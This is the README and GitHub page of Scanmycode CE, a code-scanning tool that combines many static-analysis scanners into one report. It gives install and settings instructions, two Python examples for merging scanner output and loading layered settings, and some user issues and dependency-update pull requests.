Code Scanning/SAST/Static Analysis/Linting using many tools/Scanners with One Report - Scanmycode Community Edition (CE)

Overview

Star it

If you like it, please give it a GitHub star, fork it, or contribute. This helps ensure continuous development.

TL;DR

To install it, install Docker and docker-compose, then:

git clone git@github.com:marcinguy/scanmycode-ce.git
cd scanmycode-ce/docker
./start.sh

Go in the Browser to:

http://localhost:5000

Sign up locally (and log in when needed).

Under the hood

Progpilot, PMD, Bandit, Brakeman, Gosec, confused, semgrep, trufflehog3, jshint, a custom semgrep rule for log4shell, and others. Some of them were modified.

Recorded DEMO

The Community Edition does not include GitHub support or the other commercial plugins; the rest is the same.

scanmycode-demo

Welcome to Scanmycode CE (Community Edition)!

Scanmycode is based on QuantifiedCode. QuantifiedCode is a code analysis & automation platform. It helps you keep track of issues and metrics in your software projects, and can easily be extended to support new types of analyses. The application consists of several parts:

  • A frontend, realized as a React.js app
  • A backend, realized as a Flask app, that exposes a REST API consumed by the frontend
  • A background worker, realized using Celery, that performs the code analysis

Currently supports PHP, Java, Scala, Python, Ruby, JavaScript, Go, secret scanning, dependency confusion, Trojan Source, and open-source and proprietary checks (ca. 1000 checks in total).

Advantages:

  • Many tools, one report (unification)
  • Dismiss findings, collaborate on them, and mark false positives
  • Enable or disable each individual check under Checkers
  • ca. 1000 checks today (linters, static code analysis, code scanning)
  • Any tool that outputs JSON can be added
  • Fast: on a recheck only new code is scanned
  • Git support over HTTPS/TLS and SSH; private repositories are supported over SSH only
  • Everything is callable through the REST API, so it can be integrated into CI/CD
  • A Swiss-army-knife tool/SIEM for code scanning
  • 100% code transparency and full control over your code
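To make the "many tools, one report" idea concrete, here is an added example (Python 3; not Scanmycode's own code) that does what a unifying layer has to do before any report or dismissal workflow can exist: read the JSON each scanner emits in its own shape, map the tool-specific severity words onto one scale, give every finding a stable fingerprint so a reviewer's false-positive dismissal survives unrelated edits, and optionally keep only findings that land on changed lines, which is the "only new code on recheck" behaviour. The sample Bandit, Semgrep and Gosec outputs are constructed and trimmed to the fields the adapters read; the field names follow those tools' JSON layouts, but the unified schema, the fingerprint recipe and the function names are this example's own choices.

```python
"""Normalize JSON output from several scanners into one finding schema.

Added example (not Scanmycode's own code).  The sample scanner outputs are
constructed and trimmed to the fields this normalizer reads.  Severity
vocabularies differ per tool, so each adapter maps onto one shared scale
before findings are merged into a single list.
"""
import hashlib
import json

# --- constructed sample output, one JSON document per tool ------------------
BANDIT_JSON = json.dumps({"results": [{
    "filename": "app/db.py", "line_number": 12, "test_id": "B608",
    "issue_severity": "MEDIUM", "issue_confidence": "LOW",
    "issue_text": "Possible SQL injection vector through string-based query construction.",
}]})

SEMGREP_JSON = json.dumps({"results": [
    {"check_id": "python.lang.security.audit.formatted-sql-query",
     "path": "app/db.py", "start": {"line": 12, "col": 5}, "end": {"line": 12, "col": 40},
     "extra": {"severity": "WARNING", "message": "Detected possible formatted SQL query."}},
    {"check_id": "python.flask.security.debug-enabled",
     "path": "app/main.py", "start": {"line": 40, "col": 1}, "end": {"line": 40, "col": 20},
     "extra": {"severity": "ERROR", "message": "Flask app run with debug=True."}},
]})

GOSEC_JSON = json.dumps({"Issues": [{
    "severity": "HIGH", "confidence": "HIGH", "rule_id": "G401",
    "details": "Use of weak cryptographic primitive",
    "file": "pkg/hash.go", "line": "9", "column": "2",
}]})

# One shared severity scale; every adapter must map onto these three words.
SEVERITY = {"low": 1, "medium": 2, "high": 3}


def _finding(tool, rule, path, line, severity, message):
    # Fingerprint the stable parts of a finding (not the line number) so a
    # dismissal still matches after unrelated edits shift the code around.
    fp = hashlib.sha256(f"{tool}|{rule}|{path}|{message}".encode()).hexdigest()[:16]
    return {"tool": tool, "rule": rule, "path": path, "line": line,
            "severity": severity, "message": message, "fingerprint": fp}


def _from_bandit(raw):
    for r in json.loads(raw)["results"]:
        yield _finding("bandit", r["test_id"], r["filename"], int(r["line_number"]),
                       r["issue_severity"].lower(), r["issue_text"])


def _from_semgrep(raw):
    level = {"INFO": "low", "WARNING": "medium", "ERROR": "high"}
    for r in json.loads(raw)["results"]:
        yield _finding("semgrep", r["check_id"], r["path"], int(r["start"]["line"]),
                       level[r["extra"]["severity"]], r["extra"]["message"])


def _from_gosec(raw):
    for r in json.loads(raw)["Issues"]:
        yield _finding("gosec", r["rule_id"], r["file"], int(r["line"]),
                       r["severity"].lower(), r["details"])


# Adding another JSON-emitting tool means adding one adapter here.
ADAPTERS = {"bandit": _from_bandit, "semgrep": _from_semgrep, "gosec": _from_gosec}


def unified_report(outputs, dismissed=(), changed_lines=None):
    """Merge per-tool JSON text into one sorted list of findings.

    outputs:       {tool_name: raw_json_text}
    dismissed:     fingerprints a reviewer has marked as false positives
    changed_lines: {path: set_of_line_numbers}; when given, only findings on
                   those lines are kept (the "only new code" recheck mode)
    """
    skip = set(dismissed)
    findings = []
    for tool, raw in outputs.items():
        findings.extend(ADAPTERS[tool](raw))
    findings = [f for f in findings if f["fingerprint"] not in skip]
    if changed_lines is not None:
        findings = [f for f in findings if f["line"] in changed_lines.get(f["path"], ())]
    # Highest severity first, then by location, so the report is stable across runs.
    findings.sort(key=lambda f: (-SEVERITY[f["severity"]], f["path"], f["line"], f["tool"]))
    return findings


def example():
    """Full report, then a recheck with one dismissal and a changed-lines filter."""
    outputs = {"bandit": BANDIT_JSON, "semgrep": SEMGREP_JSON, "gosec": GOSEC_JSON}
    full = unified_report(outputs)
    # A reviewer marks the Flask debug finding as a false positive (dev-only config).
    debug_fp = next(f["fingerprint"] for f in full if f["rule"].endswith("debug-enabled"))
    recheck = unified_report(outputs, dismissed=[debug_fp],
                             changed_lines={"app/db.py": {10, 11, 12}})
    return full, recheck


if __name__ == "__main__":
    full, recheck = example()
    for f in full:
        print(f"{f['severity']:6} {f['tool']:8} {f['path']}:{f['line']} {f['rule']}")
    print(len(recheck), "finding(s) on changed lines after dismissals")
```

Two design points carry over to any such unifier: fingerprint on rule, path and message rather than on the line number, otherwise every reformatting reopens dismissed findings; and keep the severity mapping explicit per adapter, because Semgrep's WARNING and Bandit's MEDIUM are the same tier only by convention you choose.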

Cloud version and more at https://www.scanmycode.today

The cloud version also ships many other plugins; further plugins (GitHub, GitHub organizations, Slack) are available commercially for licensing.

Contribute

Contributions from individuals and organizations are welcome. Feel free to contact me at [email protected]

TODO

  • update Dependencies (Backend & Frontend)
  • update to latest React
  • update to Python3
  • update/add new Checkers (if you wish)

Licensing

Scanmycode's QuantifiedCode parts remain released under the BSD 3-Clause License. The modifications, however, are released under LGPL-2.1 with the Commons Clause.

You may use this software, but you may not sell it or base services on it (SaaS, Software-as-a-Service setups); that restriction is what the Commons Clause adds. If you would like to do so, please contact me first for permission at [email protected]

Installation

We provide several options for installing Scanmycode. Which one is the right one for you depends on your use case.

  • The manual installation is best if you want to modify or change Scanmycode
  • The Docker-based installation is probably the easiest way to try Scanmycode without much work
  • The Ansible-based installation is the most suitable way if you want to run Scanmycode in a professional infrastructure (possibly with multiple servers)

The following section will only discuss the manual installation process, for the other options please check their corresponding repositories.

Manual Installation

The installation consists of three parts:

  • Install the dependencies required to run Scanmycode
  • Download the required source code
  • Set up the configuration

Installing Dependencies

Scanmycode requires the following external dependencies:

  • A message broker (required for the background tasks message queue). We recommend either RabbitMQ or Redis.
  • A database (required for the core application). We recommend PostgreSQL, but SQLite is supported as well. Other database systems might work too (e.g. MySQL), but are currently not officially supported. If you need to run Scanmycode on a non-supported database, please get in touch with us and we'll be happy to provide you some guidance.

Download the Scanmycode CE source code

Now with the dependencies installed, we can go ahead and download Scanmycode:

    git clone git@github.com:marcinguy/scanmycode-ce.git

Set up a virtual environment (optional)

In addition, it is advised to create a (Python 2.7) virtual environment to run Scanmycode in. Note that Python 2.7 reached end of life in January 2020; porting to Python 3 is on the TODO list above.

    virtualenv venv

    #activate the virtual environment
    source venv/bin/activate

Install the required Python packages

Scanmycode CE manages dependencies via the Python package manager, pip. To install them, simply run

    pip install -r requirements.txt

Edit Settings

Scanmycode is configured via YAML settings files. On start-up the application loads settings from several files in turn, recursively updating the settings object, so later files override earlier ones key by key rather than replacing whole sections:

  • First, the default settings from quantifiedcode/settings/default.yml.
  • Then, if the QC_SETTINGS environment variable is defined and points to a valid file, the settings from that file (possibly overwriting defaults). If it is not, a settings.yml file in the current working directory is used instead, if present.
  • Finally, if the QC_SECRETS environment variable is defined and points to a valid file, the settings from that file as well. This is useful for sensitive settings (database credentials, secret keys) that should be kept separate from the rest and out of version control.

Because settings.yml is picked up from the current working directory, start the application from the repository root or set QC_SETTINGS explicitly, so that a stray settings.yml somewhere else is not loaded by mistake.

There is a sample settings.yml file in the root of the repository that you can start from.
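The load order above is easy to get subtly wrong (a shallow dict update would let a one-key secrets file wipe out a whole section of defaults), so here is an added example of a loader that follows the described sequence; it is not the project's own loader, and it is written for Python 3. The file names under the temporary directory, the sample contents and the key names (`backend`, `database`, `secret_key`) are constructed for the demonstration. It uses PyYAML when installed; the sample files are written as JSON, which is valid YAML, so it also runs with only the standard library.

```python
"""Layered settings loading in the order the README describes.

Added example, not the project's own loader.  Order: defaults first, then the
file named by QC_SETTINGS (or, if that is unset or not a file, ./settings.yml
from the working directory), then the file named by QC_SECRETS.  Each layer
recursively updates the previous one, so nested keys merge instead of
replacing whole sections.  File names and contents below are constructed.
"""
import os
import tempfile

try:
    import yaml

    def _load(path):
        with open(path) as fh:
            return yaml.safe_load(fh) or {}
except ImportError:  # PyYAML not installed: JSON is a subset of YAML
    import json

    def _load(path):
        with open(path) as fh:
            return json.load(fh)


def deep_update(base, overlay):
    """Recursively merge overlay into base: nested dicts merge, scalars/lists replace."""
    for key, value in overlay.items():
        if isinstance(value, dict) and isinstance(base.get(key), dict):
            deep_update(base[key], value)
        else:
            base[key] = value
    return base


def _existing_file(path):
    return bool(path) and os.path.isfile(path)


def load_settings(default_path, env=os.environ, cwd=None):
    """Return (merged settings dict, list of files loaded in order)."""
    cwd = cwd or os.getcwd()
    layers = [default_path]
    if _existing_file(env.get("QC_SETTINGS")):
        layers.append(env["QC_SETTINGS"])
    elif _existing_file(os.path.join(cwd, "settings.yml")):
        layers.append(os.path.join(cwd, "settings.yml"))
    if _existing_file(env.get("QC_SECRETS")):
        layers.append(env["QC_SECRETS"])
    settings = {}
    for path in layers:
        deep_update(settings, _load(path))
    return settings, layers


def demo():
    """Constructed layout: defaults, a settings.yml in the cwd, and a secrets file."""
    root = tempfile.mkdtemp()

    def write(name, text):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(text)
        return path

    default = write("default.yml",
                    '{"backend": {"host": "127.0.0.1", "port": 5000, "debug": false},'
                    ' "database": {"url": "sqlite:///qc.db"}}')
    write("settings.yml",
          '{"backend": {"port": 8000}, "database": {"url": "postgresql://qc@db/qc"}}')
    secrets = write("secrets.yml", '{"backend": {"secret_key": "CHANGE-ME"}}')
    # QC_SETTINGS is left unset, so ./settings.yml from the cwd is the second layer;
    # the secret key never has to live in a file that is committed to the repository.
    env = {"QC_SECRETS": secrets}
    settings, layers = load_settings(default, env=env, cwd=root)
    return settings, [os.path.basename(p) for p in layers]


if __name__ == "__main__":
    merged, order = demo()
    print("loaded:", " -> ".join(order))
    print(merged)
```

Running it shows `backend.port` taken from settings.yml, `backend.secret_key` from the secrets file, and `backend.host` and `backend.debug` still coming from the defaults, which is exactly the behaviour a shallow `dict.update` would lose.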

Running the Setup

After editing your settings, run the setup command via

    #run from the root directory of the repository
    python manage.py setup

The setup assistant will walk you through the setup interactively, and when it finishes you should have a working instance of Scanmycode!

Running the web application

To run the web application, simply run

    python manage.py runserver

Running the background worker

To run the background worker, simply run

    python manage.py runworker

Docker-Based Installation

See docker folder. You can spin up everything using one command.

Ansible-Based Installation

Coming Soon!

Comments
  • azure devops integration failing

    azure devops integration failing

    Hi @marcinguy, I'm trying to integrate betterscan in an Azure DevOps pipeline as per the documentation, but while running the SAST task I'm getting the error message below.

    Starting: Static Application Security Test (SAST)
    
    Task         : Command line
    Description  : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows
    Version      : 2.212.0
    Author       : Microsoft Corporation
    Help         : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line
    
    Generating script.
    ========================== Starting Command Output ===========================
    /bin/bash --noprofile --norc /__w/_temp/78c91d4f-67b0-43bc-8ab3-6df1b970aab7.sh
    Switched to a new branch 'master'
    /root /__w/1/s
    Loading plugin: git
    Loading plugin: trufflehog3
    Loading plugin: trojansource
    Loading plugin: metrics
    Loading plugin: bandit
    Loading plugin: brakeman
    Loading plugin: phpanalyzer
    Loading plugin: gosec
    Loading plugin: confused
    Loading plugin: pmd
    Loading plugin: semgrep
    Loading plugin: semgrepdefi
    Loading plugin: semgrepjs
    Loading plugin: checkov
    Loading plugin: kubescape
    Loading plugin: insidersecswift
    Loading plugin: insiderseckotlin
    Loading plugin: insiderseccsharp
    Loading plugin: pmdapex
    Loading plugin: semgrepccpp
    Loading plugin: semgrepjava
    Loading plugin: semgrepeslint
    Loading plugin: graudit
    Loading plugin: text4shell
    Loading plugin: yara
    Cannot find a checkmate project in the current directory tree, aborting.
    ##[error]Bash exited with code '255'.
    Finishing: Static Application Security Test (SAST)

    opened by devendrakajala 5
  • Service 'server' failed to build

    Service 'server' failed to build

    $ ./start.sh
    Building server
    Sending build context to Docker daemon  14.85kB
    Step 1/30 : FROM python:2.7
     ---> 68e7be49c28c
    Step 2/30 : WORKDIR /
     ---> Using cache
     ---> d6858cc88a37
    Step 3/30 : RUN mkdir -p /srv
     ---> Using cache
     ---> b70ac21e5cb7
    Step 4/30 : RUN git clone https://github.com/marcinguy/scanmycode-ce.git /srv/scanmycode
     ---> Using cache
     ---> d98392912441
    Step 5/30 : WORKDIR /srv/scanmycode
     ---> Using cache
     ---> 2e54818b8ffa
    Step 6/30 : RUN git pull
     ---> Using cache
     ---> 6619cf1ee554
    Step 7/30 : RUN apt update && apt install -y libcurl4-nss-dev libssl-dev tree sudo git ssh rsync npm ruby-sass
     ---> Using cache
     ---> bc668975da08
    Step 8/30 : RUN tree
     ---> Using cache
     ---> 6a8da75efb63
    Step 9/30 : RUN pip install -r requirements.txt
     ---> Using cache
     ---> b1caa06fb2d0
    Step 10/30 : RUN pip install pylint===1.9.2
     ---> Using cache
     ---> cda9ca606748
    Step 11/30 : RUN pip install stripe
     ---> Using cache
     ---> fb63ce6873aa
    Step 12/30 : RUN git clone https://github.com/marcinguy/checkmate-ce /checkmate
     ---> Using cache
     ---> 7d2b41952c77
    Step 13/30 : WORKDIR /checkmate
     ---> Using cache
     ---> fd32c6a1e7b9
    Step 14/30 : RUN tree /checkmate
     ---> Using cache
     ---> c4f585f63486
    Step 15/30 : RUN python setup.py install
     ---> Using cache
     ---> 91e20749b951
    Step 16/30 : RUN ln -s /srv/scanmycode/quantifiedcode/settings/default.yml /srv/scanmycode/settings.yml
     ---> Using cache
     ---> 69a72977d5fe
    Step 17/30 : RUN pip install psycopg2 --upgrade
     ---> Using cache
     ---> 488aca4eaeab
    Step 18/30 : WORKDIR /srv/scanmycode/quantifiedcode/frontend
     ---> Using cache
     ---> b7783c525c4f
    Step 19/30 : RUN npm install -g bower
     ---> Using cache
     ---> bd1aa019f444
    Step 20/30 : RUN npm install --save-dev @babel/core @babel/cli
     ---> Running in bc39259dec57
    npm WARN npm npm does not support Node.js v10.24.0
    npm WARN npm You should probably upgrade to a newer version of node as we
    npm WARN npm can't make any promises that npm will work with this version.
    npm WARN npm Supported releases of Node.js are the latest release of 4, 6, 7, 8, 9.
    npm WARN npm You can find the latest version at https://nodejs.org/
    npm WARN notice [SECURITY] clean-css has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=clean-css&version=3.2.8 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.npm WARN tar write after end
    npm WARN notice [SECURITY] bower has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=bower&version=1.4.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN notice [SECURITY] uglify-js has the following vulnerabilities: 2 low. Go here for more details: https://www.npmjs.com/advisories?search=uglify-js&version=2.3.6 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN notice [SECURITY] ua-parser-js has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=ua-parser-js&version=0.7.21 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN notice [SECURITY] trim-newlines has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=trim-newlines&version=1.0.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] decompress-zip has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=decompress-zip&version=0.1.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] bl has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=bl&version=1.2.2 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN notice [SECURITY] request has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=request&version=2.53.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] handlebars has the following vulnerabilities: 2 critical, 4 high, 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=handlebars&version=2.0.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] set-value has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=set-value&version=2.0.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] hawk has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=hawk&version=1.1.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] node-fetch has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=node-fetch&version=1.7.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] braces has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=braces&version=1.8.5 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] tough-cookie has the following vulnerabilities: 1 high, 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=tough-cookie&version=0.12.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] path-parse has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=path-parse&version=1.0.6 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] minimist has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=minimist&version=0.0.10 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] lodash has the following vulnerabilities: 2 high. Go here for more details: https://www.npmjs.com/advisories?search=lodash&version=4.17.19 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] json-schema has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=json-schema&version=0.2.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] glob-parent has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=glob-parent&version=2.0.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] bl has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=bl&version=0.9.5 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] lodash has the following vulnerabilities: 4 high, 2 low. Go here for more details: https://www.npmjs.com/advisories?search=lodash&version=2.4.2 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] ini has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=ini&version=1.3.5 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] cryptiles has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=cryptiles&version=0.2.2 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] hosted-git-info has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=hosted-git-info&version=2.8.8 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] hoek has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=hoek&version=0.9.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] deep-extend has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=deep-extend&version=0.2.11 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] minimist has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=minimist&version=0.0.8 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] hawk has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=hawk&version=2.3.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] tunnel-agent has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=tunnel-agent&version=0.4.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] qs has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=qs&version=2.3.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] semver has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=semver&version=2.3.2 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] hoek has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=hoek&version=2.16.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] minimatch has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=minimatch&version=2.0.10 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] cryptiles has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=cryptiles&version=2.0.5 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm ERR! cb() never called!
    
    npm ERR! This is an error with npm itself. Please report this error at:
    npm ERR!     <https://github.com/npm/npm/issues>
    
    npm ERR! A complete log of this run can be found in:
    npm ERR!     /root/.npm/_logs/2022-02-07T04_48_57_242Z-debug.log
    The command '/bin/sh -c npm install --save-dev @babel/core @babel/cli' returned a non-zero code: 1
    ERROR: Service 'server' failed to build : Build failed
    
    opened by firmianay 4
  • Bump alembic from 1.8.1 to 1.9.1

    Bump alembic from 1.8.1 to 1.9.1

    Bumps alembic from 1.8.1 to 1.9.1.

    Release notes

    Sourced from alembic's releases.

    1.9.1

    Released: December 23, 2022

    bug

    • [bug] [autogenerate] Fixed issue where server default compare would not work for string defaults that contained backslashes, due to mis-rendering of these values when comparing their contents.

      References: #1145

    • [bug] [oracle] Implemented basic server default comparison for the Oracle backend; previously, Oracle's formatting of reflected defaults prevented any matches from occurring.

    • [bug] [sqlite] Adjusted SQLite's compare server default implementation to better handle defaults with or without parens around them, from both the reflected and the local metadata side.

    • [bug] [mssql] Adjusted SQL Server's compare server default implementation to better handle defaults with or without parens around them, from both the reflected and the local metadata side.

    1.9.0

    Released: December 15, 2022

    feature

    • [feature] [commands] Added new Alembic command alembic check. This performs the widely requested feature of running an "autogenerate" comparison between the current database and the MetaData that's currently set up for autogenerate, returning an error code if the two do not match, based on current autogenerate settings. Pull request courtesy Nathan Louie.

      References: #724

    bug

    • [bug] [tests] Fixed issue in tox.ini file where changes in the tox 4.0 series to the format of "passenv" caused tox to not function correctly, in particular raising an error as of tox 4.0.6.

    • [bug] [typing] Fixed typing issue where revision.process_revision_directives was not fully typed; additionally ensured all Callable and Dict arguments to EnvironmentContext.configure() include parameters in

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump alembic from 1.8.1 to 1.9.0

    Bump alembic from 1.8.1 to 1.9.0

    Bumps alembic from 1.8.1 to 1.9.0.

    Release notes

    Sourced from alembic's releases.

    1.9.0

    Released: December 15, 2022

    feature

    • [feature] [commands] Added new Alembic command alembic check. This performs the widely requested feature of running an "autogenerate" comparison between the current database and the MetaData that's currently set up for autogenerate, returning an error code if the two do not match, based on current autogenerate settings. Pull request courtesy Nathan Louie.

      References: #724

    bug

    • [bug] [tests] Fixed issue in tox.ini file where changes in the tox 4.0 series to the format of "passenv" caused tox to not function correctly, in particular raising an error as of tox 4.0.6.

    • [bug] [typing] Fixed typing issue where revision.process_revision_directives was not fully typed; additionally ensured all Callable and Dict arguments to EnvironmentContext.configure() include parameters in the typing declaration.

      Additionally updated the codebase for Mypy 0.990 compliance.

      References: #1110

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump jquery from 3.6.1 to 3.6.2 in /quantifiedcode/frontend

    Bump jquery from 3.6.1 to 3.6.2 in /quantifiedcode/frontend

    Bumps jquery from 3.6.1 to 3.6.2.

    Release notes

    Sourced from jquery's releases.

    jQuery 3.6.2 :has arrived!

    https://blog.jquery.com/2022/12/13/jquery-3-6-2-released/

    Commits
    • 1552b93 3.6.2
    • 2215119 Release: update authors
    • 0d9fae4 Build: Limit permissions for GitHub workflows
    • f4809f9 Build: Test on Node.js 18 & 19, stop testing on Node 12
    • 5318e31 Selector:Manipulation: Fix DOM manip within template contents
    • a1b7ae3 Selector: Update Sizzle from 2.3.7 to 2.3.8
    • 28241b7 Build: Bump actions/setup-node from 3.5.0 to 3.5.1
    • ee0fec0 Selector: Update Sizzle from 2.3.6 to 2.3.7
    • ed02835 Build: Update Grunt from 1.4.1 to 1.5.3
    • 76edd26 Docs: Update the README of the published package
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
